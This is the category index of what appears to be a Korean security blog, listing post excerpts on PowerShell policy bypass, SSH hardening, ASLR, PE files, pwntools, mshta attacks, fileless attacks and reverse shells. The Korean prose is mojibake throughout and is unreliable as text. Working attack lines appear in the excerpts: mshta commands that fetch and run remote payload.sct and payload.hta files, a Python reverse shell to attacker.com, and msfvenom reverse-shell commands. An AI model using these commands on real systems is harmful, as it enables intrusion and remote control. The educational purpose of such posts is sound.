๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
  • Tried. Failed. Logged.
728x90

๐Ÿ”’์ •๋ณด๋ณด์•ˆ/์‹œ์Šคํ…œ ๋ณด์•ˆ17

์‹œ์Šคํ…œ ๋ณด์•ˆ - Powershell ์‹คํ–‰ ์ •์ฑ… ์šฐํšŒํ•˜๋Š” 15๊ฐ€์ง€ ๋ฐฉ๋ฒ• https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/ 15 Ways to Bypass the PowerShell Execution PolicyBy default, PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems. In this blog Iโ€™ll cover 15 ways to bypass the PowerShell execution policy without having local administrator rights on .. 2024. 4. 24.
์‹œ์Šคํ…œ ๋ณด์•ˆ - SSH root ์›๊ฒฉ ์ ‘์† ์ฐจ๋‹จ ์ •์ฑ… ์„ค์ •(/etc/ssh/sshd_config) SSH root ์›๊ฒฉ ์ ‘์† ์ฐจ๋‹จ ์ •์ฑ… ์„ค์ •(/etc/ssh/sshd_config) ๊ธฐ์กด "PermitRootLogin yes"๋ฅผ "PermitRootLogin no"๋กœ ์ˆ˜์ •ํ•œ๋‹ค. # vim /etc/ssh/sshd_config # Authentication PermitRootLogin no ์„ค์ •์ด ์™„๋ฃŒํ•˜์˜€๋‹ค๋ฉด ์„œ๋น„์Šค๋ฅผ ์žฌ์‹œ์ž‘ํ•œ๋‹ค. service ssh restart ์ •์ฑ…์„ ์„ค์ •ํ•˜๊ธฐ ์ด์ „(PermitRootLogin yes) root@kali:~/Desktop# ssh root@localhost root@localhost's password: Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686 The programs inc.. 2023. 11. 10.
์‹œ์Šคํ…œ ๋ณด์•ˆ - ๋ฆฌ๋ˆ…์Šค ์ปค๋„ ASLR ๋ฉ”๋ชจ๋ฆฌ ๋ณดํ˜ธ ๊ธฐ๋ฒ• ์„ค์ •(randomize_va_space) ASLR(Address Space Layout Randomization)์ด๋ž€? ๋ฉ”๋ชจ๋ฆฌ ๊ณต๊ฒฉ์„ ๋ฐฉ์–ดํ•˜๊ธฐ ์œ„ํ•ด ์ฃผ์†Œ ๊ณต๊ฐ„ ๋ฐฐ์น˜๋ฅผ ๋‚œ์ˆ˜ ํ™”ํ•˜๋Š” ๊ธฐ๋ฒ•์œผ๋กœ ์‹คํ–‰ ์‹œ๋งˆ๋‹ค ๋ฉ”๋ชจ๋ฆฌ ์ฃผ์†Œ๋ฅผ ๋ณ€๊ฒฝ์‹œ์ผœ ์•…์„ฑ์ฝ”๋“œ์— ์˜ํ•œ ํŠน์ •์ฃผ์†Œ ํ˜ธ์ถœ์„ ๋ฐฉ์ง€ํ•œ๋‹ค. ๋ฆฌ๋ˆ…์Šค ASLR ์ ์šฉ (/proc/sys/kernel/randomize_va_space ์ˆ˜์ •) echo 0 > /proc/sys/kernel/randomize_va_space # ASLR ๋ฏธ์„ค์ • echo 1 > /proc/sys/kernel/randomize_va_space # ASLR ๋ถ€๋ถ„์„ค์ •(heap๋งŒ ๋ฏธ์„ค์ •) echo 2 > /proc/sys/kernel/randomize_va_space # ASLR ๋ชจ๋‘์„ค์ •(stack, heap, library ๋“ฑ) sysctl ๋ช…๋ น์–ด๋กœ ๋ฆฌ๋ˆ….. 2023. 11. 9.
์‹œ์Šคํ…œ ๋ณด์•ˆ - EXE ํŒŒ์ผ PE(Portable Executable) ๊ตฌ์กฐ ๋ถ„์„ํ•˜๊ธฐ PE(Portable Executable)์ด๋ž€? Windows ์šด์˜์ฒด์ œ์—์„œ ์‹คํ–‰๋˜๋Š” ์ด์ง„ ํŒŒ์ผ ํ˜•์‹์„ ์˜๋ฏธํ•œ๋‹ค. ์ด ํŒŒ์ผ ํ˜•์‹์€ Windows ์šด์˜์ฒด์ œ์—์„œ ์‹คํ–‰ ๊ฐ€๋Šฅํ•œ ํ”„๋กœ๊ทธ๋žจ, DLL, ๋“œ๋ผ์ด๋ฒ„ ๋“ฑ์— ํฌํ•จ๋œ๋‹ค. ๋ฆฌ๋ˆ…์Šค์—๋„ PE์™€ ๋น„์Šทํ•œ ํŒŒ์ผ ํ˜•์‹์ด ์žˆ์œผ๋ฉฐ ELF(Executable and Linkable Format)๋ผ๊ณ  ๋ถ€๋ฅธ๋‹ค. PE ํŒŒ์ผ ์ข…๋ฅ˜ 1) ์‹คํ–‰ ๊ณ„์—ด : EXE, SCR 2) ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ ๊ณ„์—ด : DLL, OCX, CPL, DRV 3) ๋“œ๋ผ์ด๋ธŒ ๊ณ„์—ด : SYS, VXD 4) ์˜ค๋ธŒ์ ํŠธ ํŒŒ์ผ ๊ณ„์—ด : OBJ ์‚ฌ์šฉ ๋ชฉ์  ํ”„๋กœ๊ทธ๋žจ์„ ์‚ฌ์šฉํ•˜๊ธฐ ์œ„ํ•ด์„œ๋Š” ๋ฉ”๋ชจ๋ฆฌ ๊ณต๊ฐ„์— ์ ์žฌ๊ฐ€ ๋˜์–ด์•ผ ํ•œ๋‹ค. ์ด๋•Œ PE์—๋Š” ๋ฉ”๋ชจ๋ฆฌ ๊ณต๊ฐ„์˜ ์–ด๋”” ์ฃผ์†Œ์— ์ ์žฌ๊ฐ€ ๋ ์ง€์™€ ์‹คํ–‰์— ํ•„์š”ํ•œ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ ๊ฐ™์€ ์ •๋ณด๋“ค์ด ํฌํ•จ๋˜์–ด ์žˆ๋‹ค. PE .. 2023. 10. 7.
์‹œ์Šคํ…œ ๋ณด์•ˆ - pwntools pwntools๋Š” ๋ฆฌ๋ˆ…์Šค ํ™˜๊ฒฝ์—์„œ ์‹คํ–‰ ํ”„๋กœ๊ทธ๋žจ์˜ ์ต์Šคํ”Œ๋กœ์ž‡์„ ์ž‘์„ฑํ•˜๋„๋ก ๋„์›€์„ ์ฃผ๋Š” ํŒŒ์ด์ฌ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ์ด๋‹ค. CTF์—์„œ๋„ ์œ ์šฉํ•˜๊ฒŒ ์‚ฌ์šฉ๋  ์ˆ˜ ์žˆ๋‹ค. pip ์„ค์น˜ ๋ช…๋ น์–ด python3 -m pip install --upgrade pwntools ์‚ฌ์šฉ ์˜ˆ์ œ >>> conn = remote('ftp.ubuntu.com',21) >>> conn.recvline() # doctest: +ELLIPSIS b'220 ...' >>> conn.send(b'USER anonymous\r\n') >>> conn.recvuntil(b' ', drop=True) b'331' >>> conn.recvline() b'Please specify the password.\r\n' >>> conn.close() nc(NetCat), .. 2023. 3. 25.
์‹œ์Šคํ…œ ๋ณด์•ˆ - ์œˆ๋„์šฐ MSHTA(Microsoft HTML Application) ๊ณต๊ฒฉ command-line mshta.exe vbscript:Close(Execute("GetObject(""script:http://127.0.0.1:4444/payload.sct"")")) mshta.exe http://127.0.0.1:4444/payload.hta mshta.exe \\127.0.0.1\folder\payload.hta payload.hta (SCT payloads) ๊ฒฐ๊ณผ HTA(HTML Application) ๋ณด๋Š” ๊ฒƒ์ฒ˜๋Ÿผ ์œˆ๋„์šฐ์— ๊ธฐ๋ณธ์ ์œผ๋กœ ์„ค์น˜๋œ mshta.exe(Microsoft HTML Application)๋Š” ๋งˆ์น˜ ์›น ๋ธŒ๋ผ์šฐ์ €์ฒ˜๋Ÿผ ์™ธ๋ถ€์— ์žˆ๋Š” ์›น ํŽ˜์ด์ง€๋ฅผ ์š”์ฒญํ•˜๋Š” ๊ธฐ๋Šฅ์„ ๊ฐ€์ง€๊ณ  ์žˆ๋‹ค. ์—ฌ๊ธฐ์„œ ๋ฌธ์ œ์ ์€ ์—ฌ๊ธฐ์— ๋‚ด์žฅ๋œ ๋ธŒ๋ผ์šฐ์ €๊ฐ€ ์ธํ„ฐ๋„ท ์ต์Šคํ”Œ๋กœ๋Ÿฌ ๊ธฐ๋ฐ˜์ธ์ง€ ActiveXObject.. 2023. 2. 7.
์‹œ์Šคํ…œ ๋ณด์•ˆ - ์‹คํ–‰ ํŒŒ์ผ์ด ์—†๋Š” ์šฐํšŒ ๊ธฐ๋ฒ•(ํŒŒ์ผ๋ฆฌ์Šค ๊ณต๊ฒฉ) "ํŒŒ์ผ๋ฆฌ์Šค"๋ผ๋Š” ์šฉ์–ด๋Š” ์ปดํ“จํ„ฐ์˜ ๋ฉ”๋ชจ๋ฆฌ์—๋งŒ ์žˆ๋Š” ๋ฐฑ๋„์–ด์™€ ๊ฐ™์€ ์œ„ํ˜‘์ด ํŒŒ์ผ์— ์ œ๊ณต๋˜์ง€ ์•Š์Œ์„ ์‹œ์‚ฌํ•ฉ๋‹ˆ๋‹ค. ํŒŒ์ผ๋ฆฌ์Šค ๊ธฐ๋ฒ•์€ ๊ณต๊ฒฉ์ด ํƒ์ง€๋˜์ง€ ์•Š๊ฑฐ๋‚˜ ์ถ”์ ์ด ํž˜๋“ค๋‹ค. ๊ธฐ๋ณธ์ ์œผ๋กœ ์•…์„ฑ์ฝ”๋“œ๊ฐ€ ๋””์Šคํฌ์— ํŒŒ์ผ ํ˜•ํƒœ๋กœ ์กด์žฌํ•˜์ง€ ์•Š์•„ ์Šค์บ” ๋Œ€์ƒ์ด ๋˜์ง€๊ฐ€ ์•Š๋Š”๋‹ค. 2016๋…„๋„๋ถ€ํ„ฐ ํŒŒ์›Œ์‰˜์ด ํ™œ์šฉ์ด ๋œ ํŒŒ์ผ๋ฆฌ์Šค ๊ณต๊ฒฉ์ด ์ฆ๊ฐ€์„ธ๋ฅผ ๋ณด์˜€๋‹ค. ์˜ˆ์ œ 1) LNK ํŒŒ์ผ์„ ์ด์šฉํ•œ ํŒŒ์›Œ์…ธ ์› ๋ผ์ด๋„ˆ ์‹คํ–‰ ํ™”๋ฉด์— clickme๋ผ๋Š” ์ด๋ฆ„์˜ ๋ฌธ์„œ ํŒŒ์ผ์ฒ˜๋Ÿผ ๋ณด์ด๋Š” ํŒŒ์ผ์€ ์‚ฌ์‹ค LNK ํŒŒ์ผ์ด๋‹ค. ํŒŒ์ผ์˜ ์†์„ฑ์„ ์‚ดํŽด๋ณด๋ฉด ํŒŒ์›Œ์…ธ์ด ์‹คํ–‰๋˜๋„๋ก ๋“ฑ๋ก๋ผ ์žˆ๋Š” ๊ฒƒ์„ ๋ณผ ์ˆ˜ ์žˆ๋Š”๋ฐ, ์—๋””ํ„ฐ๋ฅผ ์ด์šฉํ•ด ํŒŒ์ผ์˜ ๋‚ด์šฉ์„ ์ž์„ธํžˆ ์‚ดํŽด๋ณด๋ฉด, ํŒŒ์›Œ์…ธ ์› ๋ผ์ด๋„ˆ๋ผ๋Š” ๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค. [๊ทธ๋ฆผ 7] clickme ๋ฌธ์„œ๋กœ ๋ณด์ด๋Š” LNK ํŒŒ์ผ ์˜ˆ์ œ 2) ์—‘์…€์„ ์ด์šฉํ•œ ํŒŒ์›Œ์…ธ ์› .. 2023. 2. 7.
์‹œ์Šคํ…œ ๋ณด์•ˆ - ํŒŒ์ด์ฌ ๋ฆฌ๋ฒ„์Šค ์‰˜ ์Šคํฌ๋ฆฝํŠธ export RHOST=attacker.com export RPORT=12345 python -c 'import sys,socket,os,pty;s=socket.socket() s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")' ๋Œ€๋ถ€๋ถ„์˜ ์œ ๋‹‰์Šค ๊ณ„์—ด์˜ OS(๋ฆฌ๋ˆ…์Šค, ๋งฅos)์—๋Š” python2๋Š” ์„ค์น˜๊ฐ€ ๋˜์–ด์žˆ๋Š” ๊ฒฝ์šฐ๊ฐ€ ๋งŽ์œผ๋‹ˆ ๋ณ„๋„์˜ ์„ค์น˜ ์—†์ด ๋ช…๋ น์–ด๋งŒ์œผ๋กœ ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•˜๋‹ค. ์ถœ์ฒ˜: https://gtfobins.github.io/gtfobins/python/#reverse-shell python | GTFOBins Run socat file:`tt.. 2023. 1. 25.
์‹œ์Šคํ…œ ๋ณด์•ˆ - ๋ฉ”ํƒ€์Šคํ”Œ๋กœ์ž‡ msfvenom ๋ฆฌ๋ฒ„์Šค ์‰˜ ์ œ์ž‘ ๋ช…๋ น์–ด ์ถœ์ฒ˜: https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter) Encrypt and Anonymize Your Internet Connection for as Little as $3/mo with PIA VPN. Learn More There are tons of cheatsheets out there, but I couldnโ€™t find a comprehensive one that includes nโ€ฆ infinitelogins.com ์œˆ๋„์šฐ msfvenom -p windows/meterp.. 2023. 1. 24.
์‹œ์Šคํ…œ ๋ณด์•ˆ - EXE ํ™•์žฅ์ž๋ฅผ ๋Œ€์ฒดํ•˜๋Š” ํ™•์žฅ์ž๋“ค(SCR, COM, BAT) .exe ํ˜•ํƒœ์˜ ์‹คํ–‰ ํ”„๋กœ๊ทธ๋žจ ๋ง๊ณ ๋„ .scr๊ณผ .com์œผ๋กœ๋„ ๋™์ผํ•œ ์‹คํ–‰ ๊ฒฐ๊ณผ๋ฅผ ๊ฐ€์ ธ์˜ฌ ์ˆ˜ ์žˆ๋‹ค. .scr .scr์€ ํ™”๋ฉด ๋ณดํ˜ธ๊ธฐ ์ฆ‰ Windows Screensaver๋ฅผ ์˜๋ฏธํ•˜์ง€๋งŒ ๋งˆ์ฐฌ๊ฐ€์ง€๋กœ ํฌ๋งท ์ข…๋ฅ˜๊ฐ€ ์‹คํ–‰ ํŒŒ์ผ ํ˜•ํƒœ๋ผ์„œ .exe ํŒŒ์ผ์˜ ํ™•์žฅ์ž๋ฅผ .scr๋กœ ๋ฐ”๊ฟ”๋งŒ ์ค˜๋„ ๋˜‘๊ฐ™์ด ์‹คํ–‰์ด ์ž˜ ๋œ๋‹ค. ์ด๋ฅผ ์•…์šฉํ•˜์—ฌ ๋ฐฑ์‹  ํ”„๋กœ๊ทธ๋žจ์ด .exe๋ฅผ ์šฐ์„ ์ ์œผ๋กœ ๊ฒ€์‚ฌํ•œ๋‹ค๋Š” ๊ฒƒ์„ ์šฐํšŒํ•˜๊ธฐ ์œ„ํ•ด์„œ .scr์„ ๋Œ€์‹  ์‚ฌ์šฉํ•˜๋Š” ๋ฉ€์›จ์–ด๋„ ์กด์žฌํ•œ๋‹ค. .com .com์€ DOS Command File์œผ๋กœ .scr๊ณผ ๋งˆ์ฐฌ๊ฐ€์ง€๋กœ ์‹คํ–‰ ํŒŒ์ผ ํฌ๋งท์„ ๊ฐ€์ง€๊ณ  ์žˆ์–ด์„œ .exe ํŒŒ์ผ์„ .com์œผ๋กœ ๋ฐ”๊ฟ”์ค˜๋„ ๋™์ผํ•˜๊ฒŒ ์‹คํ–‰๋œ๋‹ค. ์›๋ž˜๋Š” DOS ํ™˜๊ฒฝ์—์„œ ์ž์ฃผ ์‚ฌ์šฉ๋˜๋˜ ํ™•์žฅ์ž์ด์—ˆ๋‹ค๊ณ  ํ•œ๋‹ค. ์šฐ๋ฆฌ๊ฐ€ ์ž์ฃผ ์‚ฌ์šฉํ•˜๋Š” ์ธํ„ฐ๋„ท ๋„๋ฉ”์ธ ".com"๊ณผ๋Š” ๋‹ค๋ฅธ ๊ฒƒ.. 2022. 10. 7.
์‹œ์Šคํ…œ ๋ณด์•ˆ - Jscript Jscript๋Š” ECMA์Šคํฌ๋ฆฝํŠธ ํ‘œ์ค€์— ๊ธฐ๋ฐ˜์„ ๋‘” ์Šคํฌ๋ฆฝํŒ… ์–ธ์–ด์ด๊ธฐ ๋•Œ๋ฌธ์— Javascript๊ณผ ๋ฌธ๋ฒ•์ด ๋˜‘๊ฐ™๋‹ค. ๊ฒŒ๋‹ค๊ฐ€ ๋‘˜ ๋‹ค ๋ธŒ๋ผ์šฐ์ €์—์„œ ์‹คํ–‰์‹œํ‚ค๋Š” ์Šคํฌ๋ฆฝํŠธ ์–ธ์–ด์ธ ๊ฒƒ๋„ ๋™์ผํ•˜๋‹ค. (Jscript: ๋งˆ์ดํฌ๋กœ์†Œํ”„ํŠธ ๊ฐœ๋ฐœ, Javascript: ๋„ท์Šค์ผ€์ดํ”„ ๊ฐœ๋ฐœ) ํ•˜์ง€๋งŒ ๋‘˜์ด ๊ฐ™๋‹ค๊ณ  ํ•  ์ˆ˜๋Š” ์—†๋Š” ๊ฒŒ Jscript๋Š” ์‹œ์Šคํ…œ ๋‚ด์— ์™ธ๋ถ€ ํ”„๋กœ๊ทธ๋žจ์„ ์‹คํ–‰์‹œํ‚ฌ ์ˆ˜ ์žˆ๋Š” WScript(์œˆ๋„์šฐ ์Šคํฌ๋ฆฝํŠธ ํ˜ธ์ŠคํŠธ)๋ฅผ ์ถ”๊ฐ€ํ•œ ์–ธ์–ด๋ผ๋Š” ์ . ์˜ˆ์‹œ๋กœ Jscript๋Š” ์ธํ„ฐ๋„ท ์ต์Šคํ”Œ๋กœ๋Ÿฌ์—์„œ ์“ฐ์ด๋Š”๋ฐ(์ง€๊ธˆ์€ ์‚ฌ์šฉ ์ค‘๋‹จํ–ˆ์ง€๋งŒ) ์šฐ๋ฆฌ๊ฐ€ ์€ํ–‰ ์‚ฌ์ดํŠธ์— ๋“ค์–ด๊ฐ€๊ฒŒ ๋˜๋ฉด ์ปดํ“จํ„ฐ์— ๊น”๋ ค์žˆ๋Š” ๋ณด์•ˆ ํ”„๋กœ๊ทธ๋žจ๊ณผ ์ƒํ˜ธ์ž‘์šฉ์„ ํ•˜๊ฒŒ ๋˜๋Š”๋ฐ ์ด๊ฒŒ WScript ๋•๋ถ„์— ๊ฐ€๋Šฅํ•œ ์ผ์ด๋‹ค. ๊ฐ€๋” ์œˆ๋„์šฐ์—์„œ .js ํŒŒ์ผ์„ ํ™•์ธํ•˜๋ฉด ์•„๋ž˜์ฒ˜๋Ÿผ ๋ญ”๊ฐ€ ์•„์ด์ฝ˜๋„ ์žˆ๊ณ  ํ•œ๋ฐ .. 2022. 10. 6.
์‹œ์Šคํ…œ ๋ณด์•ˆ - ๋ฉ€์›จ์–ด ์ œ๋กœ(Malware Zero) ๋ฌด๋ฃŒ ์•…์„ฑ ์ฝ”๋“œ ์ œ๊ฑฐ ๋„๊ตฌ https://malzero.xyz/ Malware Zero - ๋ฌด๋ฃŒ ์•…์„ฑ์ฝ”๋“œ ์ œ๊ฑฐ ๋„๊ตฌ ์•…์„ฑ์ฝ”๋“œ ๋ฐ ์• ๋“œ์›จ์–ด ๋“ฑ ๊ฐ์ข… ์œ ํ•ด ํ”„๋กœ๊ทธ๋žจ์— ์˜ํ•œ ๊ณ ํ†ต์—์„œ ํ•ด๋ฐฉ๋˜๊ธฐ ์œ„ํ•ด ์„ค์น˜ ์—†์ด ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•œ ๋ฌด๋ฃŒ ์•…์„ฑ์ฝ”๋“œ ์ œ๊ฑฐ ๋„๊ตฌ malzero.xyz ๋ฉ€์›จ์–ด ์ œ๋กœ๋Š” ์•…์„ฑ์ฝ”๋“œ ๋ถ„์„์„ ๋‹ค๋ฃจ๋Š” ๋„ค์ด๋ฒ„ ์นดํŽ˜์ธ "๋ฐ”์ด๋Ÿฌ์Šค ์ œ๋กœ: ์‹œํ๋ฆฌํ‹ฐ ์ปค๋ฎค๋‹ˆํ‹ฐ"์—์„œ ๋งŒ๋“  ๋ฌด์„ค์น˜ ์•…์„ฑ ์ฝ”๋“œ ์ œ๊ฑฐ ๋„๊ตฌ์ด๋‹ค. ์œˆ๋„์šฐ ์ „์šฉ์ด๋ฉฐ, ์‹ ๊ธฐํ•˜๊ฒŒ ๋ช…๋ น ํ”„๋กฌํ”„ํŠธ๋กœ ์ž‘๋™ํ•˜๋Š” ๋ฐฉ์‹์ด๋ผ ๋‹ค๋ฅธ ์‹คํ–‰ํŒŒ์ผ(exe)์€ ์„ค์น˜ํ•  ํ•„์š”๊ฐ€ ์—†๋‹ค. ์ž๋™ ์—…๋ฐ์ดํŠธ ๊ธฐ๋Šฅ์ด ์กด์žฌํ•˜์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์— ํ•„์š”ํ•  ๋•Œ๋งˆ๋‹ค ๊ณต์‹ ์‚ฌ์ดํŠธ์—์„œ ๋‚ด๋ ค๋ฐ›์•„ ์‚ฌ์šฉํ•ด์•ผ ํ•œ๋‹ค. ๋ง‰ ์„ค์น˜๋œ ์ปดํ“จํ„ฐ๋Š” ์ž˜ ๋ชจ๋ฅด๊ฒ ๋Š” ๋ฐ ์‚ฌ์šฉํ•œ ์ง€ ์˜ค๋ž˜๋œ ๋‚ด ์ปดํ“จํ„ฐ๋กœ ๋ฉ€์›จ์–ด ์ œ๋กœ๋ฅผ ๋Œ๋ฆฌ๋‹ˆ๊น ๊ฑฐ์˜ 2์‹œ๊ฐ„ ์ •๋„ ์ž‘์—…์ด ์ด๋ฃจ์–ด์กŒ๋‹ค. ์•„๋งˆ ํด๋”๋ž‘ .. 2022. 9. 16.
728x90